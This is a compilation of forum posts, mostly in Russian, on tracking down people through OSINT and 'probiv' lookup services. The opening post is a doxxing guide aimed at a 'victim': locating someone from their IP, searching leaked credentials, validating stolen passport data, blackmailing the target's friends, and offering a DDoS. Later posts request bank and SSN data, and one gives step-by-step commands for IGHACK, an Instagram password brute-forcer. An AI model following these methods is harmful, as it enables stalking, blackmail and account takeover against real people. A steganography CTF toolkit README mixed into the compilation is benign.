Иногда ты думаешь как узнают твои соц.сети которые ты не палил так вот ,это благодаря сайту "https://checkusernames.com/" на данном сайте вы можете без проблем найти аккаунты личности зная его ник.
Если ты хочешь узнать IP-adress человека,о бл#ть просто кинь ему ебучий ************,но если ты уже нашел его айпишник и тебе нужно узнать где он проживает тебе помогут данные сайты:
• https://whatismyipaddress.com/
• http://www.ipaddresslocation.org/
• https://lookup.icann.org/
• https://www.hashemian.com/whoami/
https://rusfinder.pro/vk/user/id********* (здесь цифровой ID) - узнать
данные указанные при регистрации аккаунта ВКонтакте.
Если ничего старого нет, обновите страницу и быстро делайте скрин области. С
новорегами не работает.
http://archive.fo - просмотреть web-архив страницы. Редко помогает.
(Ну все это были способы для того что бы найти не аноним чела,теперь приступим к самому сладкому)
Предупреждаю без слитой информации на анонимного пользователя вы с шансом 90% нихуя не найдете,можете мне не писать в личку прл это.
Для начала советую как правило пробить его ники на следующих сайтах(Старые или нынешнии ID в соц.сетях,ники в играх и т.п.)
Далее я советую вам поискать в сервисам по поиску информации в ok
Если у тебя есть почта твоего обидчика ты можешь пробить ее на наличие слитых паролей ip или же номера телефона на данном сайте
*lampyre.io
Но есть версия попроще и бесплатных пробивов доступно тоже больше это бот в
телеграмме @QUICK_Osint_bot
Так же если страница жертвы созданна 15-17 года то с шансом 70% что она есть в базе данных, проверить можно это в телеграмм боте @EyeGodsBot(так же по малейшей информации бот может вывести на настоящие,старые аккаунты в различных соц.сетях)
Или же я посоветую тебе найти даже по микроскопической инфе такое что не найдут хуесос в погонах.
*intelx.io -Поиск осуществляется по URL,IP,почты,номер телефона,некоторая информация осуществляется по поиску в даркнете
Если же ты узнал IP-adress человека и хочешь его побесить то ты можешь ему устроить бесплатную DDos аттаку:
Hidden content for authorized users.
Дада,ты видел сверху довольно не мощные пробивы по номеру телефона и прочей х#йне,но я могу тебе скинуть кое что помощнее
Пробивы по почтам:
Так же ебать я тебе солью ахуенных телеграмм ботов:
Так же ты можешь по IP-adress'у узнать что устанавливала твоя жертва по типу порнхаба и другой хуеты:
Позиционирует себя как поиск, обеспечивающий максимальную приватность и конфиденциальность. Система не собирает никаких данных о пользователе, не хранит логи (нет истории поиска), использование файлов cookie максимально ограничено, браузер выдаст вам всю самую подробную информацию о том что вы ищите, работает оцень быстро, так же рекомендую.
Если вам нужно найти номер человека вам потребуется:
1.Спросить — один из самых действенных способов.Можно спрашивать как у самой
жертвы(мол товар купить или на лечение кинуть), так и у ее друзей, на которых
у вас уже есть инфа для шантажа.
2.Попросить донашналертс(если жертва юзает Qiwi Nickname)
3.https://rutor[.]wtf/threads/probiv-socialnyx-setej-poisk-akkauntov-po-
nomeru-telefona.13273/
Обширное количество методов поиска дополнительной информации
Номер телефона - @clerkinfobot (getcontact)
Так же есть один из мощнейших пробив сейлер
https://rutor[.]wtf/forums/detektiv-kolombo-probiv-po-vsem-strukturam.177/
Если ты каким-то раком достал паспортные данные какого-то животного то ты
можешь проверить его валидность вот тут -> <http://services.fms.gov.ru/info-
service.htm?sid=2000>
После чего достаем ИНН (Если узнали паспортные данные) ->
https://service.nalog.ru/inn.html
Навыки построения графа взаимосвязей
открытых источников ](https://codeby.net/threads/maltego-instrukcija-dlja- instrumenta-razvedki-na-osnove-otkrytyx-istochnikov.67691/)
Maltego – это программа, которая проводит сбор информации на основе разнообразных сканирований, в том числе сканирований на наличие документов с метаданными, сканирований уязвимостей, программа анализирует полученную информацию и графически отображает собранные данные. У Maltego графический...
codeby.net
Основой для будущего сканера было решено выбрать крупную базу данных уязвимостей Vulners от российских разработчиков. Этот проект включает в себя обширную коллекцию сведений об уязвимостях систем на базе Linux и предлагает RESTful API для удобного взаимодействия с последней. Одной из ключевых особенностей проекта является возможность проведения «удаленного» аудита безопасности Linux-хоста.
Vulners - Vulnerability DataBase
vulners.com
Далеко ходить не потребовалось — сам агрегатор предлагает ряд программных
продуктов для упрощения работы со своей БД, в том числе:
vulners-scanner – Proof-of-Concept аудита безопасности Linux, демонстрирующий
возможности API Vulners.com;
vulners-agent – агент для Linux-сервера, позволяющий проводить сканирование по
планировщику cron;
nmap-vulners – NSE-скрипт для Nmap, позволяющий выявить угрозы безопасности,
исходя из информации, полученной от сервисов, которые запущенны на открытых
портах исследуемого хоста;
api – средство разработчика, представляющее из себя враппер веб-API
Vulners.com в виде подключаемого модуля для Python (доступен для установки
через PyPI).
Ошибка
https://zhuteli.rosfirm.info - одна из баз данных адресов. Многих городов нет, ищем по районному центру
1. Имя (без фамилии) + город (районный центр/поселок/село) + дата рождения
(число).
2. ИФ + город (путем отсеивания результатов).
3. Город (районный центр) + полная дата рождения.
4. Поиск родственников по фамилии (если известен возраст, в фильтрах ставим
возраст ОТ по арифметической формуле 18+{полный возраст жертвы}), далее поиск
в друзьях странных имен, ников (если не удается найти старые страницы по
настоящим данным).
5. Идентификатор канала на YouTube в Google (позволяет узнать старое название
канала).
Social Security No. + DOB
Social Security No. last 4 digits + DOB
Reverse Social Security No.
Credit Report/Credit Score
Background Report
Mothers Maiden Name
Driver License
AUTO/Color/VIN
Dob
Address
Telephone
Имеется ввиду, (интересует) где пробивают это - сервисы пробива, а не сами сервисы пробива на форумах.
Ищу сервисы для OSINT'а с API.
Также ищу сервисы может даже и без апи, но с возможностью спарсить данные.
Меня интересуют сервисы, которые будут давать информацию по мобильному
телефону, ФИО, Email, никнеймы, гос.номера авто, vin номер, по адресу
проживания(желательно, чтобы выдавалась планировка квартиры, дома, квадратура
участка и тд), ИНН и т.п.
Приветствуются и бдшки
Need TLO for UK forex database, message me privately if you can offer this service, around 300k lines. Silly offers will be ignored.
Хочу подобрать инструменты для поиска, например, иностранных активных форумов. Условно, Google Dorks подобрать довольно сложно для того, чтобы оценить активность, а не только поиск по ключевым словам. Может есть какие-то агрегаторы ссылок, которые не ищутся через открытые источники? Или я что-то ищу не так?
Необходимо мониторить GitHub по ключевым словам с целью отслеживания появления новых проектов. Чем это можно делать?
I saved a Maltego file using the Encrypt AES-128 with a password
But when I try to open the file I get this
Nothing on google x(
I have a person name and need to find their bank info in the USA. if you can do this dm me https://t.me/lether222
Is there a tool similar to socradar.io/labs that allows you to check a domain
without requiring access to an email address associated with that domain?
For instance, if I want to download a report for facebook.com, I need to have
an email address ending with @facebook.com
hello people,
I am here looking for guidance on how to get the phone number or email of
different employees at specific companies off linkedin or some other platform
if possible.
Im really good at social engineering but lack the skills of actually finding
contact methods for employees at companies
hopefully someone can help me out,
Thankss
Привет, в данной статье хочу росказать как сделать свой osint браузер по типу venator ( https://t.me/venatorbrowser )
Основа венатора это браузер ( LibreWolf ), сегодня под основу я возьму
firefox, что есть в венаторе при установке, чего нет в простом firefox или же
librewolfe? Правильно: папок,закладок,расшрений,и встроенных софтов.
Мы начнем с расширений которые испозую я в своем браузере, почему я буду
писать все что использую я? Правильно зачем повторять полностью venator, если
его можно просто поставить себе на систему, я думаю стоит начать с расширений
для браузера,
лично я испольузую:
](https://addons.mozilla.org/ru/firefox/addon/osintx/)
ÐагÑÑзиÑÑ OsintX Ð´Ð»Ñ Firefox. OsintX ð is an extension that allows you to automate research tasks but not that OsintX also allows you to practice osint easily without skill.
addons.mozilla.org
![addons.mozilla.org](/proxy.php?image=https%3A%2F%2Faddons.mozilla.org%2Fuser- media%2Fpreviews%2Ffull%2F257%2F257276.png%3Fmodified%3D1622499623&hash=762d7322abc81e518afeecc5f4f09da1&return_error=1)
ÑаÑÑиÑение Ð´Ð»Ñ ð¦ Firefox (ru) ](https://addons.mozilla.org/ru/firefox/addon/osiris-osint-reputation/)
ÐагÑÑзиÑÑ OSIRIS: OSINT Reputation Intelligent Search Ð´Ð»Ñ Firefox. Use this extension to analyze IoCs' reputation using OSINT
addons.mozilla.org
![addons.mozilla.org](/proxy.php?image=https%3A%2F%2Faddons.mozilla.org%2Fuser- media%2Fpreviews%2Ffull%2F192%2F192605.png%3Fmodified%3D1622132519&hash=74bd2b12321079ee9bf1410405d72365&return_error=1)
(ru) ](https://addons.mozilla.org/ru/firefox/addon/exif-viewer/)
ÐагÑÑзиÑÑ Exif Viewer Ð´Ð»Ñ Firefox. Displays the Exif and IPTC data in local and remote JPEG images.
addons.mozilla.org
Как их установить, я думаю вы поймете, также у меня установлен spiderfoot, его
тоже можно добавить,
установите себе на систему python, для этого нужно зайти на официальный сайт
python,
https://www.python.org/
Далее "Customize installation"
После установки python, себе на систему нужно установить: https://github.com/smicallef/spiderfoot.git
далее разархивируйте его, зайдите в саму папку и там где путь к папке
пропишите " cmd "
напишите pip install -r requirements.txt, после установки библиотек пропишите
в том же окне консоли
python sf.py -l 127.0.0.1:5001 ( для запуска )
5001, это порт по умолчанию для spiderfoot, если вы хотите его изменить
Зайдите в саму папку и там где путь к папке пропишите " cmd "
Используя следующую команду для запуска SpiderFoot на новом порту (замени <новый_порт> на нужное значение):
python sf.py -l 127.0.0.1:<новый_порт>
Например, если ты хочешь запустить SpiderFoot на порту 8888, используй:
python sf.py -l 127.0.0.1:8888
далее создайте закладку в браузере з ссылкой на открытие spiderfoot к примеру http://127.0.0.1:5001,
spiderfoot готов, расширения готовы, остались только папки с инструментами, ну лично у меня нет ботов, так как они в telegram, а вот сайты к примеру можно найти в этих темах
Hi,
Do any one have a method or any technique to find out what phone number used to create an account or email address or find logged IP of a facebook user? Especially about the IP, as much as details possible.
I'm open to pay no less than 500$
Hit me a message if you have
Вот есть ( точнее был, сейчас его ликвидировали спецслужбы) миксер ChipMixer. Мне хотелось бы посмотреть его истоки в инернете. А именно: как он развивался, какие самые первые статьи и что о нем они публиковали, какие коммерческие действия он предпринимал для продвижения своего сайта (продукта). В общем надеюсь вы поняли меня )
До начала событий на Украине, в Телеге был бот по комплексному пробиву по Yandex сервисам(бесплатный). Бот ушел в небытие. Посоветуйте решение(Github/Бот и т.п.), которое бесплатно позволяет по E-mail(в домене яндекса) сделать поиск по всем "сервисам" Яндекса.
Раньше были сервисы, которые показывали штрафы ГИБДД(по России) только на
основании гос. номера.
Существует ли сейчас подобные ресурсы или теперь СТС обязателен для проверки?
Здравствуйте, я ищу номер телефона гражданина Великобритании, у меня есть имя и фамилия, адрес электронной почты и номер телефона, которые недоступны. Я думаю, что этот человек изменил свой номер телефона, и я хочу найти его новый номер телефона.
Если кто-то разбирается в поиске в Великобритании, пожалуйста, свяжитесь со мной.
tg: @mariahfrank
Hello, I’m looking for a phone number of UK citizen, I have first name and last name, email and phone number which is not in service, I think this person changed his phone number and I want to find his new phone number.
If anyone is proficient in lookups please contact me.
tg: @mariahfrank
Есть ТГ боты, которые по номеру телефона могут показать размер последнего
платежа в МТС(если телефонный номер принадлежит МТС) и подключен ли МТС-
деньги.
Вопрос: через какой механизм(подозреваю, что API) они реализуют данный
функционал?
Подскажите поисковик по социальным медиа и социальным сетям, очень нужен телеграмм
https://kribrum.io упал...
**qq l33t HaXXorZ
RU:
Некоторая помощь нужна потерял свой большой список онлайн-сервиса**
**для разведки целевого веб-приложения,нужна ваша помощь кто знает эффективные
сервисы отпишите побрацки,такие как анализаторы языка/кмс на котором работает
веб-приложение.По-рекомендуйте такие сайты похожие как на dnsdumpster
hunter.io.
Заранее спасибо **l33t HaXXorZ.
EN:
Need help, I've lost a large list of online services to learn the target web
application.
I need your help, who knows the effective services, such as the language/kms
analyzers.
That run the web application.
Recommend sites like dnsdumpster hunter.io.
Thanks in advance l33t HaXXorZ.
Есть маска E-mail s.mi****@mail.ru (s\.mi.*@mail\.ru) и сервис, на котором
ВОЗМОЖНО есть нужный E-mail. Сервис умеет отвечать True на правильный E-mail,
переданный в качестве логина.
Необходимо подготовить словарь по маске емейлов, для проверки на сервисе.
Тупая генерация словаря - не вариант.
Вопрос : кто из онлайн сервисов/программ умеет проверять в базах утечек
именно по маске(регекс) мыла?
П.С. Смотрел h8mail - он не умеет
П.П.С. или подскажите где взять готовый словарь из ВСЕХ утечек mail.ru, что бы
его фильтрануть по маске.
Кто-нибудь знает возможно это сделать? Я кажется раньше видел бот специальный, но не уверен что он таки определял ник человека по айди
Всем привет!возник такой вопрос,может кто сможет помочь! есть авто, в 2011 году авто юр лицом бралось в лизинг в другом регионе.ограничений на авто нет.можно ли как то проверить закрыты ли обязательства по лизингу?
В сфере около года, умею работать с поисковиками, Maltego, Кронос. Имею
большое количество сервисов для поиска. Есть доступ к самой популярной ИАС,
название которой писать не буду . При желании могу сделать почти всë :
От поиска номера по вк, до детализации кошельков.
Времени могу уделять не более трëх часов в день. Только Онлайн.
Крутой инструмент для ведения OSINT - OSINT Framework
Инструмент с большим количеством функций, от сканирование сайтов до деанонимизации по номеру и id telegram. Инструмент существует в двух версиях, бесплатной [ ознокомительной ] на git, и платной по подписке. Сейчас ребята прорабатывают личный кабинет на сайте с всеми функциями из консольной версии фрэймворка.
Разбор 4.0 версии фрэймворка:
Видеогайд по установке:
Дополнительные материалы по установке: https://t.me/osint_san_framework/389
Пароль для входа в free версию: iloveyouosint
Официальный сайт проекта: https://osintsan.ru
Официальный паблик разработки и поддержки: Bafomet OSINT
(https://t.me/osint_san_framework)
Полезный инструмент OSINT для извлечения информации из любой учетной записи
Google. вот один из скриншотов.
Статья: https://telegra.ph/Gmail-OSINT-Poisk-informacii-o-cheloveke-12-28
Вариация в телеграм боте: @mailcat_s_bot
инструмент который можт найти существующие адреса электронной почты по никнейму,
**Вариация в телеграм боте: @holehe_s_bot
Инструмент которые проверяет, прикреплено ли электронное письмо к учетной
записи на таких сайтах, как Twitter, Instagram, imgur и более чем 120 других.
https://github.com/sherlock-project/sherlock - **sherlock
Поиск по никнейму, скрин из самого шерлока
https://github.com/snooppr/snoop - snoop
Так-же поиск по никнейму, и так-же скрины
**
https://github.com/sham00n/buster - buster**
Данный инструмент используется для:
Определения социальных учётных записей по электронной почте (Пravatar,
about.me, Myspace, Skype, GitHub, Linkedin)
Поиск рабочей электронной почты человека
Получение ссылки на сайт, где было найдено электронное письмо, используя
Google, Twitter, DarkSearch и Paste
Поиск доменов, зарегистрированных по электронной почте (обратный whois)
Генерация возможных адресов электронной почты и имён пользователей
Поиск учётной записи в социальной сети по адресу электронной почты
Поиск электронных писем от имени пользователя.
Прикрепил курс Боевого OSINT от Codeby
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/Im12SJAB#Do4nZnDZ7FcP8pTK70jTv0yUgTRPJMoeWurdlgtCEdw)
mega.nz
Информация очень емкая и полезная
Настоятельно рекомендую к ознакомлению
Стоит задача выяснить, есть ли где-то на поддомене панель авторизации Outlook
Web App.
На входе список корневых доменов компаний.
Есть ли какой-то быстрый способ?
Поиск поддоменов и сверка по title занимает слишком много времени
Всем привет кто подскажет как пробивать по номеру? Могу дать свои знания в ответ
vc.ru ](https://vc.ru/u/1311068-digital-razvedka/528246)
В наше время фейковые новости - очень важная проблема СМИ.
![vc.ru](/proxy.php?image=https%3A%2F%2Fvc.ru%2Fstatic%2Fbuild%2Fvc.ru%2Ffavicons%2Fapple- touch-icon-180x180.png&hash=815515efbc06242364439d5a27d6e603&return_error=1) vc.ru
Всем привет! Подскажите, есть ли существенная разница в платной и бесплатной версии? Если да, то немного поподробнее можно узнать в чем? как вы получали платный досту? Там вроде надо контактировать с представителем компании... Есть ли еще такие же комплексные инструменты, но более доступные для использования? Если не хотите особо делиться инфой, то хоть намекните... можно в ПМ. Спасибо!
Enjoy for the 9th edition (2022)!
https://gofile.io/d/Nkpkc8
Steganography is hiding a file or a message inside of another file , there are many funsteganography CTF challenges out there where the flag is hidden in an image , audio file or even other types of files. Here is a list of the most tools I use and some other useful resources .
Tools to run in the beginning.Allow you to get a broad idea of what you are dealing with.
Tool| Description| How to use
---|---|---
file| Check out what kind of file you have| file stego.jpg
exiftool| Check out metadata of media files| exiftool stego.jpg
binwalk| Check out if other files are embedded/appended| binwalk stego.jpg
strings| Check out if there are interesting readable characters in the file|
strings stego.jpg
foremost| Carve out embedded/appended files| foremost stego.jpg
pngcheck| Get details on a PNG file (or find out is is actually something
else)| pngcheck stego.png
identify| GraphicMagick tool to check what
kind of image a file is. Checks also if image is corrupted.| identify -verbose
stego.jpg
ffmpeg| ffmpeg can be used to check integrity of audio files and let it report
infos and errors| ffmpeg -v info -i stego.mp3 -f null - to recode the file and
throw away the result
Tools you can use to hide messages and reveal them afterwards.Some encrypt the messages before hiding them.If they do, they require a password.If you have a hint what kind of tool was used or what password might be right, try these tools.Some tools are supported by the brute force scripts available in this Docker image.
Tool| File types| Description| How to hide| How to recover
---|---|---|---|---
AudioStego| Audio (MP3 /
WAV)| Details on how it works are in this blog
post| hideme cover.mp3
secret.txt && mv ./output.mp3 stego.mp3| hideme stego.mp3 -f && cat output.txt
jphide/jpseek| Image (JPG)|
Pretty old tool from here. Here,
the version from here is installed since
the original one crashed all the time. It prompts for a passphrase
interactively!| jphide cover.jpg stego.jpg secret.txt| jpseek stego.jpg
output.txt
jsteg| Image (JPG)| LSB stego tool.
Does not encrypt the message.| jsteg hide cover.jpg secret.txt stego.jpg|
jsteg reveal cover.jpg output.txt
mp3stego| Audio (MP3)|
Old program. Encrypts and then hides a message (3DES encryption!). Windows
tool running in Wine. Requires WAV input (may throw errors for certain WAV
files. what works for me is e.g.: ffmpeg -i audio.mp3 -flags bitexact
audio.wav). Important: use absolute path only!| mp3stego-encode -E secret.txt
-P password /path/to/cover.wav /path/to/stego.mp3| mp3stego-decode -X -P
password /path/to/stego.mp3 /path/to/out.pcm /path/to/out.txt
openstego| Images (PNG)| Various LSB
stego algorithms (check out this blog). Still
maintained.| openstego embed -mf secret.txt -cf cover.png -p password -sf
stego.png| openstego extract -sf openstego.png -p abcd -xf output.txt (leave
out -xf to create file with original name!)
outguess| Images (JPG)| Uses
"redundant bits" to hide data. Comes in two versions: old=outguess-0.13 taken
from here and new=outguess from the
package repos. To recover, you must use the one used for hiding.| outguess -k
password -d secret.txt cover.jpg stego.jpg| outguess -r -k password stego.jpg
output.txt
spectrology| Audio (WAV)| Encodes
an image in the spectrogram of an audio file.| TODO| Use GUI tool sonic-
visualiser
stegano| Images (PNG)| Hides data
with various (LSB-based) methods. Provides also some screening tools.|
stegano-lsb hide --input cover.jpg -f secret.txt -e UTF-8 --output stego.png
or stegano-red hide --input cover.png -m "secret msg" --output stego.png or
stegano-lsb-set hide --input cover.png -f secret.txt -e UTF-8 -g $GENERATOR
--output stego.png for various generators (stegano-lsb-set list-generators)|
stegano-lsb reveal -i stego.png -e UTF-8 -o output.txt or stegano-red reveal
-i stego.png or stegano-lsb-set reveal -i stego.png -e UTF-8 -g $GENERATOR -o
output.txt
Steghide| Images (JPG, BMP) and Audio
(WAV, AU)| Versatile and mature tool to encrypt and hide data.| steghide embed
-f -ef secret.txt -cf cover.jpg -p password -sf stego.jpg| steghide extract
-sf stego.jpg -p password -xf output.txt
cloackedpixel| Images (PNG)| LSB
stego tool for images| cloackedpixel hide cover.jpg secret.txt password
creates cover.jpg-stego.png| cloackedpixel extract cover.jpg-stego.png
output.txt password
LSBSteg| Images (PNG, BMP,
...) in uncompressed formats| Simple LSB tools with very nice and readable
Python code| LSBSteg encode -i cover.png -o stego.png -f secret.txt| LSBSteg
decode -i stego.png -o output.txt
f5| Images (JPG)| F5
Steganographic Algorithm with detailed info on the process| f5 -t e -i
cover.jpg -o stego.jpg -d 'secret message'| f5 -t x -i stego.jpg 1> output.txt
stegpy| Images (PNG, GIF, BMP, WebP)
and Audio (WAV)| Simple steganography program based on the LSB method| stegpy
secret.jpg cover.png| stegpy _cover.png
All tools below have graphical user interfaces and cannot be used through the command line.To run them, you must make an X11 server available inside the container.Two ways are supported:
Alternatively, find other ways to make X11 available inside the container.Many different ways are possible (e.g., [mount UNIX sockets](https://medium.com/@pigiuz/hw-accelerated-gui-apps-on- docker-7fd424fe813e)).
Tool| File types| Description| How to start
---|---|---|---
Steg| Images (JPG, TIFF, PNG, BMP)| Handles many
file types and implements different methods| steg
Steganabara (The original
link is broken)|
Images (???)| Interactively transform images until you find something|
steganabara
Stegsolve| Images (???)|
Interactively transform images, view color schemes separately, ...| stegsolve
SonicVisualiser| Audio (???)| Visualizing
audio files in waveform, display spectrograms, ...| sonic-visualiser
Stegosuite| Images (JPG, GIF, BMP)| Can encrypt and
hide data in images. Actively developed.| stegosuite
OpenPuff| Images,
Audio, Video (many formats)| Sophisticated tool with long history. Still
maintained. Windows tool running in wine.| openpuff
DeepSound| Audio (MP3, WAV)| Audio stego tool
trusted by Mr. Robot himself. Windows tool running in wine (very hacky,
requires VNC and runs in virtual desktop, MP3 broken due to missing DLL!)|
deepsound only in VNC session
cloackedpixel-analyse| Images (PNG)|
LSB stego visualization for PNGs - use it to detect suspiciously random LSB
values in images (values close to 0.5 may indicate encrypted data is
embedded)| cloackedpixel-analyse image.png
Many tools above do not require interaction with a GUI.Therefore, you can easily automate some workflows to do basic screening of files potentially containing hidden messages.Since the applicable tools differ by filet type, each file type has different scripts.
For each file type, there are two kinds of scripts:
The following file types are supported:
The brute forcing scripts above need wordlists.Imho it will very likely not help to use huge standard wordlists like rockyou.The scripts are too slow for it and stego challenges seem to not be designed forthis.A more probable scenario is that you have a hunch what the password could be butyou do not know exactly.
For these cases, several tools to generate wordlists are included:
The image contains a sample image and audio file each in different formats:
It also contains a script /examples/create_examples.sh which you can run to embed a hidden message ("This is a very secret message!") into these files with many different methods.After running this script, you find these files in /examples/stego-files with their names indicating which tool was used to embed the message.You can run the screening scripts to see if they find anything on them or try to break them otherwise.
By default, no GUI tools can be run in a Docker container as no X11 server is available.To run them, you must change that.What is required to do so depends on your host machine.If you:
Use X11 forwarding through SSH if you want to go this way. Run start_ssh inside the container to start the server, make sure you expose port 22 when starting the container: docker run -p 127.0.0.1:22:22 ..., then use ssh -X ... when connecting (the script prints the password).
To not depend on X11, the image comes with a TigerVNC server and noVNC client.You can use it to open an HTML5 VNC session with your browser to connect to the containers Xfce desktop. To to that, run start_vnc.sh inside the container to start server and client, make sure you expose port 6901 when starting the container docker run -p 127.0.0.1:6901:6901 ... and go to localhost:6901/?password=<the_password> (the script prints the password).
Commands in the GIF for copy & paste:
docker run -it --rm -p 127.0.0.1:22:22 dominicbreuker/stego-toolkit /bin/bash
start_ssh.sh
ssh -X -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@localhost
Commands in the GIF for copy & paste:
docker run -it --rm -p 127.0.0.1:6901:6901 dominicbreuker/stego-toolkit /bin/bash
start_vnc.sh
http://localhost:6901/?password=<password_from_start_vnc>
Ищу работу ОСИНТом в команде! Проработал более 4 лет. Пишите - буду рад любым предложениям!
Где искать граждан италии? боты сервисы?
Does anyone know how the script proceeds to check when a given email address
is linked to a gmail account?.
Tks ia.
nowafpls - это простой плагин Burp, который контекстно вставляет эти нежелательные данные в HTTP-запрос на вкладке relay. Вы можете выбрать один из предустановленных объемов нежелательных данных для вставки, либо вставить произвольный объем нежелательных данных, выбрав опцию "Пользовательский".
insertion of Junk Data ](https://github.com/assetnote/nowafpls)
Burp Plugin to Bypass WAFs through the insertion of Junk Data - assetnote/nowafpls
github.com
Разработчик mxrch представил новую версию программы GHunt, предназначенную для сбора информации о пользователях Google. GHunt позиционируется как инструмент OSINT-разведки, что означает, что он использует общедоступные данные для получения информации.
Возможности GHunt:
GHunt – это мощный инструмент, который может быть использован для самых разных целей:
Следует принять во внимание, что в некоторых странах использование GHunt может быть незаконным. Перед применением GHunt крайне важно тщательно изучить действующее законодательство вашего региона и убедиться, что его использование не нарушает никаких правовых норм. Компания-разработчик GHunt не несет ответственности за любое неправомерное или противозаконное использование данного инструмента. Настоятельно рекомендуем ознакомиться с соответствующими законами и нормативными актами, регулирующими данную сферу в вашей юрисдикции, чтобы избежать каких-либо правонарушений.
GHunt доступен на GitHub .
Помните, что GHunt – это мощный инструмент, который может быть использован как
во благо, так и во вред. Используйте его ответственно.
Разберём новую утилиту в Termux
https://play.google.com/store/apps/details?id=com.termux&hl=ru
для взлома Instagram брутфорсом - перебор паролей.
Инструмент называется IGHACK.
Приступим к его установке и обновляем пакеты:
apt update
apt upgrade
Скачиваем Python:
pkg install python -y
Скачиваем Python2:
pkg install python2 -y
Скачиваем git:
pkg install git -y
Клонируем репозиторий:
git clone https://github.com/noob-hackers/ighack
Открываем инструмент:
cd $HOME
ls
cd ighack
ls
bash setup
bash ighack.sh
Oткрывается пять опций:
auto attack - автоматическая брутфорс атака, с паролями по умолчанию
manual attack - брутфорс атака вручную, с листом паролей
about - описание утилиты
update - обновление рекомендую выбрать перед запуском
exit - выход из инструмента
Удачи в использовании.
добрый день есть ли хотя бы в теории возможность пробить актуальный номер телефона,email гражданина Германии или членов его семьи? имея ФИО и адрес проживания
What is the most effective method of getting the email address of a Facebook user?
Now more than ever, it is important to be able to get more context about the images we find online. Google, which plays a crucial role in the way we receive information, has begun implementing new features to help people quickly and easily assess the credibility of images and provide the following context:
You must have at least 0 reaction(s) to view the content.
◼ When approximately the image were first indexed by Google
◼ Where it may have first appeared
◼ Where else it’s been seen online
These features could be particularly useful for an [#OSINT](https://www.linkedin.com/signup/cold- join?session_redirect=https%3A%2F%2Fwww.linkedin.com%2Ffeed%2Fhashtag%2Fosint&trk=public_post- text) investigation or fact-checking task.
I am currently looking pipl alternative since this service is paid and new users not able to create account for free is there any services available which are as good as pipl ?
Привет! Во время очередного серфинга по сети я нашел довольно интересный
инструмент для поиска по электронной почте. Можно сделать несколько бесплатных
запросов. Вот ссылка на инструмент: https://intelbase.is/
Hidden content for authorized users.
](https://anonfiles.com/V2h6ebDau5/Michael_Bazzell_- _Extreme_Privacy_2nd_Edition_pdf)
anonfiles.com
В последнее время я сух насчет целей, в основном педофилов.. кто-нибудь знает, где искать?
i do have zoominfo used for searching an organization full information . reach out if you are interested
Hi,
I want share to you OSINT tools to different purposes:
**
Aware Online:**
Tool that group different search engines where you can do search by:
Companies, telephone, email, into archives, social media.. In my opinion, the
group that did this website is not bad:
![www.aware-online.com](/proxy.php?image=https%3A%2F%2Fwww.aware- online.com%2Fwp-content%2Fuploads%2FAware-Online- Cover.jpg&hash=44d17d42f003192c1d68df20cc849cc2&return_error=1)
](https://www.aware-online.com/osint-tools/)
OSINT-tools. Wilt u effectief op zoek naar informatie op het internet en social media? Gebruik onze maatwerk tools en scripts in uw onderzoek.
![www.aware-online.com](/proxy.php?image=https%3A%2F%2Fwww.aware- online.com%2Fwp-content%2Fuploads%2FAware-Online- Favicon.png&hash=d703821b649f0f77c5620b2fc2686a39&return_error=1) www.aware- online.com
**
Moose:**
An Austrian search engine, they told that they are an "independent" search
engine:
Suchmaschine für Österreich. Trag auch deine Seite ein!
www.moose.at
Courtlistener:
Interesting search engine of public documents of US courts.
https://www.courtlistener.com/
**
FaceCheck:**
Other search engine that search using a uploaded picture (search similar
faces)
![facecheck.id](/proxy.php?image=https%3A%2F%2Ffacecheck.id%2Fimg%2Fen_reverse- image-search-face.png&hash=eae0835383f333cdd594f392718bdbee&return_error=1)
](https://facecheck.id/)
Find anyone online with FaceCheck.ID face recognition search engine. Search for people by photo and verify you are talking to the person they claim to be.
facecheck.id
Qwant :
French search engine, they ensure that your search are private (in the
surface, lemme doubt it)
![www.qwant.com](/proxy.php?image=https%3A%2F%2Fwww.qwant.com%2Fpublic%2Fqwant- logo- seo.428f3e63f20cbe1140831437e92fcb36.png&hash=629cf6e3dba8c9e034e5eecf95cb3639&return_error=1)
The 1st European search engine that respects your privacy.
www.qwant.com
I hope that any of this tools can to be helpful for you in your searches
Неизмеримые объемы
личных, потенциально инкриминируемых данных хранятся в настоящее время на веб-
сайтах, приложениях и платформах социальных сетей, к которым люди ежедневно
обращаются и которые обновляют с помощью своих устройств. Эти данные могут
стать доказательством для граждан, правительств и компаний, чтобы использовать
их при решении реальных финансовых, трудовых и криминальных проблем с помощью
профессионального сборщика информации. SEC487 обучает студентов законным и
эффективным способам поиска, сбора и анализа этих данных из Интернета. Вы
узнаете о надежных местах сбора данных с использованием ручных и
автоматизированных методы и инструменты. Как только вы получите данные, мы
покажем вам, как обеспечить, чтобы эти данные были проанализированы,
обоснованы и полезны для ваших расследований. Это фундаментальный курс по
сбору разведывательных данных из открытых источников (OSINT), и, как таковой,
он быстро пройдется по многим областям этой сферы. Курс научит вас актуальным,
реальным навыкам, методам и инструментам, которые используют
правоохранительные органы, частные детективы, киберзлоумышленники и защитники.
используют для изучения огромного количества информации в Интернете, анализа
результатов и на интересных фрагментах данных, чтобы найти другие области для
расследования. Наша цель - предоставить студентам базу знаний по OSINT чтобы
студенты могли успешно работать в своих областях, будь то киберзащитники,
аналитики по разведке угроз, частные детективы, аналитики угроз, частные
детективы, расследователи страховых случаев, аналитики разведки, сотрудники
правоохранительных органов. аналитики, сотрудники правоохранительных органов
или просто любопытствующие о OSINT. На протяжении всей недели курса студенты
будут участвовать в многочисленных практических занятиях, используя
инструменты и методы, которые являются основой для сбора бесплатных данных из
Интернета. В 20 лабораторных работа. В 20 лабораторных работах курса
используется живой Интернет и темная паутина, что помогает студентам получить
реальные знания. Вы
По окончании курса вы будете знать не только, как использовать функции поиска
на веб-сайте, но и все сценарные требования и методы OSINT, необходимые для
сбора действительно важных данных OSINT.
GoFile:
You must have at least 5 reaction(s) to view the content.
VirusTotal: VT
Может кто знает, нужен бот в тг который по ссылке скачивает видео с youtube.спасибо
В арсенал опытных OSINT сыщиков входит директива под названием Check WebArchive. Данный кейс предлагает оперативному сотруднику проверить URL сайта (если такой имеется) по базе снимков, сделанных с помощью автоматического сервиса https://web.archive.org/
Веб-архив (Webarchive) — это бесплатная платформа, где собраны все сайты, созданные когда-либо, и на которые не наложен запрет для их сохранения.
